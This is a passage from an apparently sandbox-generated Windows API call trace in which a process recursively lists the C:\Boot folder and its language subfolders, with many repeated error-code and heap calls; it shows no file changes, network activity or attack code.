(dwErrCode=0x0) [0065.265] GetLastError () returned 0x0 [0065.265] SetLastError (dwErrCode=0x0) [0065.265] GetLastError () returned 0x0 [0065.265] SetLastError (dwErrCode=0x0) [0065.265] GetLastError () returned 0x0 [0065.265] SetLastError (dwErrCode=0x0) [0065.265] GetLastError () returned 0x0 [0065.265] SetLastError (dwErrCode=0x0) [0065.265] GetLastError () returned 0x0 [0065.265] SetLastError (dwErrCode=0x0) [0065.265] GetLastError () returned 0x0 [0065.265] SetLastError (dwErrCode=0x0) [0065.265] GetLastError () returned 0x0 [0065.265] SetLastError (dwErrCode=0x0) [0065.265] GetLastError () returned 0x0 [0065.265] SetLastError (dwErrCode=0x0) [0065.265] GetLastError () returned 0x0 [0065.266] SetLastError (dwErrCode=0x0) [0065.266] GetLastError () returned 0x0 [0065.266] SetLastError (dwErrCode=0x0) [0065.266] GetLastError () returned 0x0 [0065.266] SetLastError (dwErrCode=0x0) [0065.266] GetLastError () returned 0x0 [0065.266] SetLastError (dwErrCode=0x0) [0065.266] GetLastError () returned 0x0 [0065.266] SetLastError (dwErrCode=0x0) [0065.266] GetLastError () returned 0x0 [0065.266] SetLastError (dwErrCode=0x0) [0065.266] GetLastError () returned 0x0 [0065.266] SetLastError (dwErrCode=0x0) [0065.266] GetLastError () returned 0x0 [0065.266] SetLastError (dwErrCode=0x0) [0065.266] GetLastError () returned 0x0 [0065.266] SetLastError (dwErrCode=0x0) [0065.266] GetLastError () returned 0x0 [0065.266] SetLastError (dwErrCode=0x0) [0065.266] GetLastError () returned 0x0 [0065.266] SetLastError (dwErrCode=0x0) [0065.266] GetLastError () returned 0x0 [0065.266] SetLastError (dwErrCode=0x0) [0065.266] GetLastError () returned 0x0 [0065.266] SetLastError (dwErrCode=0x0) [0065.266] GetLastError () returned 0x0 [0065.266] SetLastError (dwErrCode=0x0) [0065.267] GetLastError () returned 0x0 [0065.267] SetLastError (dwErrCode=0x0) [0065.267] FindNextFileW (in: hFindFile=0x2e84c0, lpFindFileData=0x11ff208 | out: lpFindFileData=0x11ff208) returned 0 [0065.267] FindClose (in: hFindFile=0x2e84c0 | out: hFindFile=0x2e84c0) returned 1 [0065.267] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0xd67a60 | out: hHeap=0x8c0000) returned 1 [0065.267] FindNextFileW (in: hFindFile=0x2ebd30, lpFindFileData=0x11ff48c | out: lpFindFileData=0x11ff48c) returned 0 [0065.267] FindClose (in: hFindFile=0x2ebd30 | out: hFindFile=0x2ebd30) returned 1 [0065.267] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0xd57a58 | out: hHeap=0x8c0000) returned 1 [0065.267] FindNextFileW (in: hFindFile=0x2ebcf0, lpFindFileData=0x11ff710 | out: lpFindFileData=0x11ff710) returned 1 [0065.267] GetLastError () returned 0x12 [0065.267] SetLastError (dwErrCode=0x12) [0065.267] GetLastError () returned 0x12 [0065.267] SetLastError (dwErrCode=0x12) [0065.267] GetLastError () returned 0x12 [0065.267] SetLastError (dwErrCode=0x12) [0065.267] GetLastError () returned 0x12 [0065.267] SetLastError (dwErrCode=0x12) [0065.267] GetLastError () returned 0x12 [0065.267] SetLastError (dwErrCode=0x12) [0065.267] GetLastError () returned 0x12 [0065.267] SetLastError (dwErrCode=0x12) [0065.267] GetLastError () returned 0x12 [0065.268] SetLastError (dwErrCode=0x12) [0065.268] GetLastError () returned 0x12 [0065.268] SetLastError (dwErrCode=0x12) [0065.268] GetLastError () returned 0x12 [0065.268] SetLastError (dwErrCode=0x12) [0065.268] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x10000) returned 0xd57a58 [0065.268] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\*", lpFindFileData=0x11ff48c | out: lpFindFileData=0x11ff48c) returned 0x2ebd30 [0065.268] FindNextFileW (in: hFindFile=0x2ebd30, lpFindFileData=0x11ff48c | out: lpFindFileData=0x11ff48c) returned 1 [0065.268] FindNextFileW (in: hFindFile=0x2ebd30, lpFindFileData=0x11ff48c | out: lpFindFileData=0x11ff48c) returned 1 [0065.268] GetLastError () returned 0x12 [0065.268] SetLastError (dwErrCode=0x12) [0065.268] GetLastError () returned 0x12 [0065.268] SetLastError (dwErrCode=0x12) [0065.268] GetLastError () returned 0x12 [0065.268] SetLastError (dwErrCode=0x12) [0065.268] GetLastError () returned 0x12 [0065.268] SetLastError (dwErrCode=0x12) [0065.268] GetLastError () returned 0x12 [0065.268] SetLastError (dwErrCode=0x12) [0065.268] GetLastError () returned 0x12 [0065.268] SetLastError (dwErrCode=0x12) [0065.268] GetLastError () returned 0x12 [0065.269] SetLastError (dwErrCode=0x12) [0065.269] GetLastError () returned 0x12 [0065.269] SetLastError (dwErrCode=0x12) [0065.269] GetLastError () returned 0x12 [0065.269] SetLastError (dwErrCode=0x12) [0065.269] GetLastError () returned 0x12 [0065.269] SetLastError (dwErrCode=0x12) [0065.269] GetLastError () returned 0x12 [0065.269] SetLastError (dwErrCode=0x12) [0065.269] GetLastError () returned 0x12 [0065.269] SetLastError (dwErrCode=0x12) [0065.269] GetLastError () returned 0x12 [0065.269] SetLastError (dwErrCode=0x12) [0065.269] GetLastError () returned 0x12 [0065.269] SetLastError (dwErrCode=0x12) [0065.269] GetLastError () returned 0x12 [0065.269] SetLastError (dwErrCode=0x12) [0065.269] GetLastError () returned 0x12 [0065.269] SetLastError (dwErrCode=0x12) [0065.269] GetLastError () returned 0x12 [0065.269] SetLastError (dwErrCode=0x12) [0065.269] GetLastError () returned 0x12 [0065.269] SetLastError (dwErrCode=0x12) [0065.269] SetEvent (hEvent=0xf8) returned 1 [0065.270] ResetEvent (hEvent=0xf4) returned 1 [0065.270] FindNextFileW (in: hFindFile=0x2ebd30, lpFindFileData=0x11ff48c | out: lpFindFileData=0x11ff48c) returned 1 [0065.270] GetLastError () returned 0x12 [0065.270] SetLastError (dwErrCode=0x12) [0065.270] GetLastError () returned 0x12 [0065.270] SetLastError (dwErrCode=0x12) [0065.270] GetLastError () returned 0x12 [0065.270] SetLastError (dwErrCode=0x12) [0065.270] GetLastError () returned 0x12 [0065.270] SetLastError (dwErrCode=0x12) [0065.270] GetLastError () returned 0x12 [0065.270] SetLastError (dwErrCode=0x12) [0065.270] GetLastError () returned 0x12 [0065.270] SetLastError (dwErrCode=0x12) [0065.270] GetLastError () returned 0x12 [0065.270] SetLastError (dwErrCode=0x12) [0065.270] GetLastError () returned 0x12 [0065.270] SetLastError (dwErrCode=0x12) [0065.270] GetLastError () returned 0x12 [0065.270] SetLastError (dwErrCode=0x12) [0065.270] GetLastError () returned 0x12 [0065.270] SetLastError (dwErrCode=0x12) [0065.270] GetLastError () returned 0x12 [0065.271] SetLastError (dwErrCode=0x12) [0065.271] GetLastError () returned 0x12 [0065.271] SetLastError (dwErrCode=0x12) [0065.271] GetLastError () returned 0x12 [0065.271] SetLastError (dwErrCode=0x12) [0065.271] GetLastError () returned 0x12 [0065.271] SetLastError (dwErrCode=0x12) [0065.271] GetLastError () returned 0x12 [0065.271] SetLastError (dwErrCode=0x12) [0065.271] GetLastError () returned 0x12 [0065.271] SetLastError (dwErrCode=0x12) [0065.271] GetLastError () returned 0x12 [0065.271] SetLastError (dwErrCode=0x12) [0065.271] GetLastError () returned 0x12 [0065.271] SetLastError (dwErrCode=0x12) [0065.271] GetLastError () returned 0x12 [0065.271] SetLastError (dwErrCode=0x12) [0065.271] GetLastError () returned 0x12 [0065.271] SetLastError (dwErrCode=0x12) [0065.271] GetLastError () returned 0x12 [0065.271] SetLastError (dwErrCode=0x12) [0065.271] GetLastError () returned 0x12 [0065.271] SetLastError (dwErrCode=0x12) [0065.271] GetLastError () returned 0x12 [0065.271] SetLastError (dwErrCode=0x12) [0065.272] GetLastError () returned 0x12 [0065.272] SetLastError (dwErrCode=0x12) [0065.272] GetLastError () returned 0x12 [0065.272] SetLastError (dwErrCode=0x12) [0065.272] GetLastError () returned 0x12 [0065.272] SetLastError (dwErrCode=0x12) [0065.272] GetLastError () returned 0x12 [0065.272] SetLastError (dwErrCode=0x12) [0065.272] GetLastError () returned 0x12 [0065.272] SetLastError (dwErrCode=0x12) [0065.272] GetLastError () returned 0x12 [0065.272] SetLastError (dwErrCode=0x12) [0065.272] GetLastError () returned 0x12 [0065.272] SetLastError (dwErrCode=0x12) [0065.272] GetLastError () returned 0x12 [0065.272] SetLastError (dwErrCode=0x12) [0065.272] GetLastError () returned 0x12 [0065.272] SetLastError (dwErrCode=0x12) [0065.272] GetLastError () returned 0x12 [0065.272] SetLastError (dwErrCode=0x12) [0065.272] GetLastError () returned 0x12 [0065.272] SetLastError (dwErrCode=0x12) [0065.272] GetLastError () returned 0x12 [0065.272] SetLastError (dwErrCode=0x12) [0065.272] GetLastError () returned 0x12 [0065.272] SetLastError (dwErrCode=0x12) [0065.272] GetLastError () returned 0x12 [0065.273] SetLastError (dwErrCode=0x12) [0065.273] GetLastError () returned 0x12 [0065.273] SetLastError (dwErrCode=0x12) [0065.273] GetLastError () returned 0x12 [0065.273] SetLastError (dwErrCode=0x12) [0065.273] GetLastError () returned 0x12 [0065.273] SetLastError (dwErrCode=0x12) [0065.273] GetLastError () returned 0x12 [0065.273] SetLastError (dwErrCode=0x12) [0065.273] GetLastError () returned 0x12 [0065.273] SetLastError (dwErrCode=0x12) [0065.273] GetLastError () returned 0x12 [0065.273] SetLastError (dwErrCode=0x12) [0065.273] GetLastError () returned 0x12 [0065.273] SetLastError (dwErrCode=0x12) [0065.273] GetLastError () returned 0x12 [0065.273] SetLastError (dwErrCode=0x12) [0065.273] GetLastError () returned 0x12 [0065.273] SetLastError (dwErrCode=0x12) [0065.273] GetLastError () returned 0x12 [0065.273] SetLastError (dwErrCode=0x12) [0065.273] GetLastError () returned 0x12 [0065.273] SetLastError (dwErrCode=0x12) [0065.273] GetLastError () returned 0x12 [0065.273] SetLastError (dwErrCode=0x12) [0065.273] GetLastError () returned 0x12 [0065.274] SetLastError (dwErrCode=0x12) [0065.274] GetLastError () returned 0x12 [0065.274] SetLastError (dwErrCode=0x12) [0065.274] GetLastError () returned 0x12 [0065.274] SetLastError (dwErrCode=0x12) [0065.274] GetLastError () returned 0x12 [0065.274] SetLastError (dwErrCode=0x12) [0065.274] GetLastError () returned 0x12 [0065.274] SetLastError (dwErrCode=0x12) [0065.274] GetLastError () returned 0x12 [0065.274] SetLastError (dwErrCode=0x12) [0065.274] GetLastError () returned 0x12 [0065.274] SetLastError (dwErrCode=0x12) [0065.274] GetLastError () returned 0x12 [0065.274] SetLastError (dwErrCode=0x12) [0065.274] GetLastError () returned 0x12 [0065.274] SetLastError (dwErrCode=0x12) [0065.274] GetLastError () returned 0x12 [0065.274] SetLastError (dwErrCode=0x12) [0065.274] GetLastError () returned 0x12 [0065.274] SetLastError (dwErrCode=0x12) [0065.274] GetLastError () returned 0x12 [0065.274] SetLastError (dwErrCode=0x12) [0065.274] GetLastError () returned 0x12 [0065.274] SetLastError (dwErrCode=0x12) [0065.274] GetLastError () returned 0x12 [0065.274] SetLastError (dwErrCode=0x12) [0065.275] GetLastError () returned 0x12 [0065.275] SetLastError (dwErrCode=0x12) [0065.275] GetLastError () returned 0x12 [0065.275] SetLastError (dwErrCode=0x12) [0065.275] GetLastError () returned 0x12 [0065.275] SetLastError (dwErrCode=0x12) [0065.275] GetLastError () returned 0x12 [0065.275] SetLastError (dwErrCode=0x12) [0065.275] FindNextFileW (in: hFindFile=0x2ebd30, lpFindFileData=0x11ff48c | out: lpFindFileData=0x11ff48c) returned 1 [0065.275] FindNextFileW (in: hFindFile=0x2ebd30, lpFindFileData=0x11ff48c | out: lpFindFileData=0x11ff48c) returned 1 [0065.275] FindNextFileW (in: hFindFile=0x2ebd30, lpFindFileData=0x11ff48c | out: lpFindFileData=0x11ff48c) returned 1 [0065.275] FindNextFileW (in: hFindFile=0x2ebd30, lpFindFileData=0x11ff48c | out: lpFindFileData=0x11ff48c) returned 1 [0065.275] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\cs-CZ\\*", lpFindFileData=0x11ff208 | out: lpFindFileData=0x11ff208) returned 0x2e84c0 [0065.276] FindNextFileW (in: hFindFile=0x2e84c0, lpFindFileData=0x11ff208 | out: lpFindFileData=0x11ff208) returned 1 [0065.276] FindNextFileW (in: hFindFile=0x2e84c0, lpFindFileData=0x11ff208 | out: lpFindFileData=0x11ff208) returned 1 [0065.276] FindNextFileW (in: hFindFile=0x2e84c0, lpFindFileData=0x11ff208 | out: lpFindFileData=0x11ff208) returned 0 [0065.276] FindClose (in: hFindFile=0x2e84c0 | out: hFindFile=0x2e84c0) returned 1 [0065.276] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0xd67a60 | out: hHeap=0x8c0000) returned 1 [0065.276] FindNextFileW (in: hFindFile=0x2ebd30, lpFindFileData=0x11ff48c | out: lpFindFileData=0x11ff48c) returned 1 [0065.276] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\da-DK\\*", lpFindFileData=0x11ff208 | out: lpFindFileData=0x11ff208) returned 0x2e84c0 [0065.277] FindNextFileW (in: hFindFile=0x2e84c0, lpFindFileData=0x11ff208 | out: lpFindFileData=0x11ff208) returned 1 [0065.277] FindNextFileW (in: hFindFile=0x2e84c0, lpFindFileData=0x11ff208 | out: lpFindFileData=0x11ff208) returned 1 [0065.277] FindNextFileW (in: hFindFile=0x2e84c0, lpFindFileData=0x11ff208 | out: lpFindFileData=0x11ff208) returned 0 [0065.277] FindClose (in: hFindFile=0x2e84c0 | out: hFindFile=0x2e84c0) returned 1 [0065.277] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0xd67a60 | out: hHeap=0x8c0000) returned 1 [0065.277] FindNextFileW (in: hFindFile=0x2ebd30, lpFindFileData=0x11ff48c | out: lpFindFileData=0x11ff48c) returned 1 [0065.277] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\de-DE\\*", lpFindFileData=0x11ff208 | out: lpFindFileData=0x11ff208) returned 0x2e84c0 [0065.278] FindNextFileW (in: hFindFile=0x2e84c0, lpFindFileData=0x11ff208 | out: lpFindFileData=0x11ff208) returned 1 [0065.278] FindNextFileW (in: hFindFile=0x2e84c0, lpFindFileData=0x11ff208 | out: lpFindFileData=0x11ff208) returned 1 [0065.278] FindNextFileW (in: hFindFile=0x2e84c0, lpFindFileData=0x11ff208 | out: lpFindFileData=0x11ff208) returned 0 [0065.278] FindClose (in: hFindFile=0x2e84c0 | out: hFindFile=0x2e84c0) returned 1 [0065.278] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0xd67a60 | out: hHeap=0x8c0000) returned 1 [0065.278] FindNextFileW (in: hFindFile=0x2ebd30, lpFindFileData=0x11ff48c | out: lpFindFileData=0x11ff48c) returned 1 [0065.278] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\el-GR\\*", lpFindFileData=0x11ff208 | out: lpFindFileData=0x11ff208) returned 0x2e84c0 [0065.278] FindNextFileW (in: hFindFile=0x2e84c0, lpFindFileData=0x11ff208 | out: lpFindFileData=0x11ff208) returned 1 [0065.278] FindNextFileW (in: hFindFile=0x2e84c0, lpFindFileData=0x11ff208 | out: lpFindFileData=0x11ff208) returned 1 [0065.278] FindNextFileW (in: hFindFile=0x2e84c0, lpFindFileData=0x11ff208 | out: lpFindFileData=0x11ff208) returned 0 [0065.278] FindClose (in: hFindFile=0x2e84c0 | out: hFindFile=0x2e84c0) returned 1 [0065.278] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0xd67a60 | out: hHeap=0x8c0000) returned 1 [0065.278] FindNextFileW (in: hFindFile=0x2ebd30, lpFindFileData=0x11ff48c | out: lpFindFileData=0x11ff48c) returned 1 [0065.278] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\en-US\\*", lpFindFileData=0x11ff208 | out: lpFindFileData=0x11ff208) returned 0x2e84c0 [0065.279] FindNextFileW (in: hFindFile=0x2e84c0, lpFindFileData=0x11ff208 | out: lpFindFileData=0x11ff208) returned 1 [0065.279] FindNextFileW (in: hFindFile=0x2e84c0, lpFindFileData=0x11ff208 | out: lpFindFileData=0x11ff208) returned 1 [0065.279] FindNextFileW (in: hFindFile=0x2e84c0, lpFindFileData=0x11ff208 | out: lpFindFileData=0x11ff208) returned 1 [0065.279] FindNextFileW (in: hFindFile=0x2e84c0, lpFindFileData=0x11ff208 | out: lpFindFileData=0x11ff208) returned 0 [0065.279] FindClose (in: hFindFile=0x2e84c0 | out: hFindFile=0x2e84c0) returned 1 [0065.280] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0xd67a60 | out: hHeap=0x8c0000) returned 1 [0065.280] FindNextFileW (in: hFindFile=0x2ebd30, lpFindFileData=0x11ff48c | out: lpFindFileData=0x11ff48c) returned 1 [0065.280] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\es-ES\\*", lpFindFileData=0x11ff208 | out: lpFindFileData=0x11ff208) returned 0x2e84c0 [0065.280] FindNextFileW (in: hFindFile=0x2e84c0, lpFindFileData=0x11ff208 | out: lpFindFileData=0x11ff208) returned 1 [0065.280] FindNextFileW (in: hFindFile=0x2e84c0, lpFindFileData=0x11ff208 | out: lpFindFileData=0x11ff208) returned 1 [0065.281] FindNextFileW (in: hFindFile=0x2e84c0, lpFindFileData=0x11ff208 | out: lpFindFileData=0x11ff208) returned 0 [0065.281] FindClose (in: hFindFile=0x2e84c0 | out: hFindFile=0x2e84c0) returned 1 [0065.281] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0xd67a60 | out: hHeap=0x8c0000) returned 1 [0065.281] FindNextFileW (in: hFindFile=0x2ebd30, lpFindFileData=0x11ff48c | out: lpFindFileData=0x11ff48c) returned 1 [0065.281] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\fi-FI\\*", lpFindFileData=0x11ff208 | out: lpFindFileData=0x11ff208) returned 0x2e84c0 [0065.281] FindNextFileW (in: hFindFile=0x2e84c0, lpFindFileData=0x11ff208 | out: lpFindFileData=0x11ff208) returned 1 [0065.281] FindNextFileW (in: hFindFile=0x2e84c0, lpFindFileData=0x11ff208 | out: lpFindFileData=0x11ff208) returned 1 [0065.281] FindNextFileW (in: hFindFile=0x2e84c0, lpFindFileData=0x11ff208 | out: lpFindFileData=0x11ff208) returned 0 [0065.281] FindClose (in: hFindFile=0x2e84c0 | out: hFindFile=0x2e84c0) returned 1 [0065.281] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0xd67a60 | out: hHeap=0x8c0000) returned 1 [0065.281] FindNextFileW (in: hFindFile=0x2ebd30, lpFindFileData=0x11ff48c | out: lpFindFileData=0x11ff48c) returned 1 [0065.281] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\Fonts\\*", lpFindFileData=0x11ff208 | out: lpFindFileData=0x11ff208) returned 0x2e84c0 [0065.282] FindNextFileW (in: hFindFile=0x2e84c0, lpFindFileData=0x11ff208 | out: lpFindFileData=0x11ff208) returned 1 [0065.282] FindNextFileW (in: hFindFile=0x2e84c0, lpFindFileData=0x11ff208 | out: lpFindFileData=0x11ff208) returned 1 [0065.282] FindNextFileW (in: hFindFile=0x2e84c0, lpFindFileData=0x11ff208 | out: lpFindFileData=0x11ff208) returned 1 [0065.282] FindNextFileW (in: hFindFile=0x2e84c0, lpFindFileData=0x11ff208 | out: lpFindFileData=0x11ff208) returned 1 [0065.282] FindNextFileW (in: hFindFile=0x2e84c0, lpFindFileData=0x11ff208 | out: lpFindFileData=0x11ff208) returned 1 [0065.282] FindNextFileW (in: hFindFile=0x2e84c0, lpFindFileData=0x11ff208 | out: lpFindFileData=0x11ff208) returned 1 [0065.282] FindNextFileW (in: hFindFile=0x2e84c0, lpFindFileData=0x11ff208 | out: lpFindFileData=0x11ff208) returned 0 [0065.283] FindClose (in: hFindFile=0x2e84c0 | out: hFindFile=0x2e84c0) returned 1 [0065.283] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0xd67a60 | out: hHeap=0x8c0000) returned 1 [0065.283] FindNextFileW (in: hFindFile=0x2ebd30, lpFindFileData=0x11ff48c | out: lpFindFileData=0x11ff48c) returned 1 [0065.283] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\fr-FR\\*", lpFindFileData=0x11ff208 | out: lpFindFileData=0x11ff208) returned 0x2f3170 [0065.420] FindNextFileW (in: hFindFile=0x2f3170, lpFindFileData=0x11ff208 | out: lpFindFileData=0x11ff208) returned 1 [0065.420] FindNextFileW (in: hFindFile=0x2f3170, lpFindFileData=0x11ff208 | out: lpFindFileData=0x11ff208) returned 1 [0065.420] FindNextFileW (in: hFindFile=0x2f3170, lpFindFileData=0x11ff208 | out: lpFindFileData=0x11ff208) returned 0 [0065.420] FindClose (in: hFindFile=0x2f3170 | out: hFindFile=0x2f3170) returned 1 [0065.420] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0xd67a60 | out: hHeap=0x8c0000) returned 1 [0065.420] FindNextFileW (in: hFindFile=0x2ebd30, lpFindFileData=0x11ff48c | out: lpFindFileData=0x11ff48c) returned 1 [0065.420] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\hu-HU\\*", lpFindFileData=0x11ff208 | out: lpFindFileData=0x11ff208) returned 0x2f3170 [0065.421] FindNextFileW (in: hFindFile=0x2f3170, lpFindFileData=0x11ff208 | out: lpFindFileData=0x11ff208) returned 1 [0065.421] FindNextFileW (in: hFindFile=0x2f3170, lpFindFileData=0x11ff208 | out: lpFindFileData=0x11ff208) returned 1 [0065.421] FindNextFileW (in: hFindFile=0x2f3170, lpFindFileData=0x11ff208 | out: lpFindFileData=0x11ff208) returned 0 [0065.421] FindClose (in: hFindFile=0x2f3170 | out: hFindFile=0x2f3170) returned 1 [0065.421] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0xd67a60 | out: hHeap=0x8c0000) returned 1 [0065.421] FindNextFileW (in: hFindFile=0x2ebd30, lpFindFileData=0x11ff48c | out: lpFindFileData=0x11ff48c) returned 1 [0065.421] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\it-IT\\*", lpFindFileData=0x11ff208 | out: lpFindFileData=0x11ff208) returned 0x2f3170 [0065.424] FindNextFileW (in: hFindFile=0x2f3170, lpFindFileData=0x11ff208 | out: lpFindFileData=0x11ff208) returned 1 [0065.424] FindNextFileW (in: hFindFile=0x2f3170, lpFindFileData=0x11ff208 | out: lpFindFileData=0x11ff208) returned 1 [0065.424] FindNextFileW (in: hFindFile=0x2f3170, lpFindFileData=0x11ff208 | out: lpFindFileData=0x11ff208) returned 0 [0065.424] FindClose (in: hFindFile=0x2f3170 | out: hFindFile=0x2f3170) returned 1 [0065.424] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0xd67a60 | out: hHeap=0x8c0000) returned 1 [0065.424] FindNextFileW (in: hFindFile=0x2ebd30, lpFindFileData=0x11ff48c | out: lpFindFileData=0x11ff48c) returned 1 [0065.424] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\ja-JP\\*", lpFindFileData=0x11ff208 | out: lpFindFileData=0x11ff208) returned 0x2f3170 [0065.425] FindNextFileW (in: hFindFile=0x2f3170, lpFindFileData=0x11ff208 | out: lpFindFileData=0x11ff208) returned 1 [0065.425] FindNextFileW (in: hFindFile=0x2f3170, lpFindFileData=0x11ff208 | out: lpFindFileData=0x11ff208) returned 1 [0065.425] FindNextFileW (in: hFindFile=0x2f3170, lpFindFileData=0x11ff208 | out: lpFindFileData=0x11ff208) returned 0 [0065.425] FindClose (in: hFindFile=0x2f3170 | out: hFindFile=0x2f3170) returned 1 [0065.425] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0xd67a60 | out: hHeap=0x8c0000) returned 1 [0065.425] FindNextFileW (in: hFindFile=0x2ebd30, lpFindFileData=0x11ff48c | out: lpFindFileData=0x11ff48c) returned 1 [0065.425] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\ko-KR\\*", lpFindFileData=0x11ff208 | out: lpFindFileData=0x11ff208) returned 0x2f3170 [0065.428] FindNextFileW (in: hFindFile=0x2f3170, lpFindFileData=0x11ff208 | out: lpFindFileData=0x11ff208) returned 1 [0065.428] FindNextFileW (in: hFindFile=0x2f3170, lpFindFileData=0x11ff208 | out: lpFindFileData=0x11ff208) returned 1 [0065.428] FindNextFileW (in: hFindFile=0x2f3170, lpFindFileData=0x11ff208 | out: lpFindFileData=0x11ff208) returned 0 [0065.428] FindClose (in: hFindFile=0x2f3170 | out: hFindFile=0x2f3170) returned 1 [0065.428] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0xd67a60 | out: hHeap=0x8c0000) returned 1 [0065.428] FindNextFileW (in: hFindFile=0x2ebd30, lpFindFileData=0x11ff48c | out: lpFindFileData=0x11ff48c) returned 1 [0065.428] FindNextFileW (in: hFindFile=0x2ebd30, lpFindFileData=0x11ff48c | out: lpFindFileData=0x11ff48c) returned 1 [0065.429] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\nb-NO\\*", lpFindFileData=0x11ff208 | out: lpFindFileData=0x11ff208) returned 0x2f3170 [0065.429] FindNextFileW (in: hFindFile=0x2f3170, lpFindFileData=0x11ff208 | out: lpFindFileData=0x11ff208) returned 1 [0065.429] FindNextFileW (in: hFindFile=0x2f3170, lpFindFileData=0x11ff208 | out: lpFindFileData=0x11ff208) returned 1 [0065.429] FindNextFileW (in: hFindFile=0x2f3170, lpFindFileData=0x11ff208 | out: lpFindFileData=0x11ff208) returned 0 [0065.429] FindClose (in: hFindFile=0x2f3170 | out: hFindFile=0x2f3170) returned 1 [0065.429] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0xd67a60 | out: hHeap=0x8c0000) returned 1 [0065.429] FindNextFileW (in: hFindFile=0x2ebd30, lpFindFileData=0x11ff48c | out: lpFindFileData=0x11ff48c) returned 1 [0065.429] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\nl-NL\\*", lpFindFileData=0x11ff208 | out: lpFindFileData=0x11ff208) returned 0x2f31b0 [0065.465] FindNextFileW (in: hFindFile=0x2f31b0, lpFindFileData=0x11ff208 | out: lpFindFileData=0x11ff208) returned 1 [0065.465] FindNextFileW (in: hFindFile=0x2f31b0, lpFindFileData=0x11ff208 | out: lpFindFileData=0x11ff208) returned 1 [0065.467] FindNextFileW (in: hFindFile=0x2f31b0, lpFindFileData=0x11ff208 | out: lpFindFileData=0x11ff208) returned 0 [0065.467] FindClose (in: hFindFile=0x2f31b0 | out: hFindFile=0x2f31b0) returned 1 [0065.467] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0xd67a60 | out: hHeap=0x8c0000) returned 1 [0065.467] FindNextFileW (in: hFindFile=0x2ebd30, lpFindFileData=0x11ff48c | out: lpFindFileData=0x11ff48c) returned 1 [0065.467] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\pl-PL\\*", lpFindFileData=0x11ff208 | out: lpFindFileData=0x11ff208) returned 0x2f31b0 [0065.467] FindNextFileW (in: hFindFile=0x2f31b0, lpFindFileData=0x11ff208 | out: lpFindFileData=0x11ff208) returned 1 [0065.467] FindNextFileW (in: hFindFile=0x2f31b0, lpFindFileData=0x11ff208 | out: lpFindFileData=0x11ff208) returned 1 [0065.469] FindNextFileW (in: hFindFile=0x2f31b0, lpFindFileData=0x11ff208 | out: lpFindFileData=0x11ff208) returned 0 [0065.469] FindClose (in: hFindFile=0x2f31b0 | out: hFindFile=0x2f31b0) returned 1 [0065.469] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0xd67a60 | out: hHeap=0x8c0000) returned 1 [0065.469] FindNextFileW (in: hFindFile=0x2ebd30, lpFindFileData=0x11ff48c | out: lpFindFileData=0x11ff48c) returned 1 [0065.469] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\pt-BR\\*", lpFindFileData=0x11ff208 | out: lpFindFileData=0x11ff208) returned 0x2f31b0 [0065.469] FindNextFileW (in: hFindFile=0x2f31b0, lpFindFileData=0x11ff208 | out: lpFindFileData=0x11ff208) returned 1 [0065.469] FindNextFileW (in: hFindFile=0x2f31b0, lpFindFileData=0x11ff208 | out: lpFindFileData=0x11ff208) returned 1 [0065.471] FindNextFileW (in: hFindFile=0x2f31b0, lpFindFileData=0x11ff208 | out: lpFindFileData=0x11ff208) returned 0 [0065.471] FindClose (in: hFindFile=0x2f31b0 | out: hFindFile=0x2f31b0) returned 1 [0065.471] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0xd67a60 | out: hHeap=0x8c0000) returned 1 [0065.471] FindNextFileW (in: hFindFile=0x2ebd30, lpFindFileData=0x11ff48c | out: lpFindFileData=0x11ff48c) returned 1 [0065.471] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\pt-PT\\*", lpFindFileData=0x11ff208 | out: lpFindFileData=0x11ff208) returned 0x2f31b0 [0065.471] FindNextFileW (in: hFindFile=0x2f31b0, lpFindFileData=0x11ff208 | out: lpFindFileData=0x11ff208) returned 1 [0065.471] FindNextFileW (in: hFindFile=0x2f31b0, lpFindFileData=0x11ff208 | out: lpFindFileData=0x11ff208) returned 1 [0065.473] FindNextFileW (in: hFindFile=0x2f31b0, lpFindFileData=0x11ff208 | out: lpFindFileData=0x11ff208) returned 0 [0065.473] FindClose (in: hFindFile=0x2f31b0 | out: hFindFile=0x2f31b0) returned 1 [0065.473] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0xd67a60 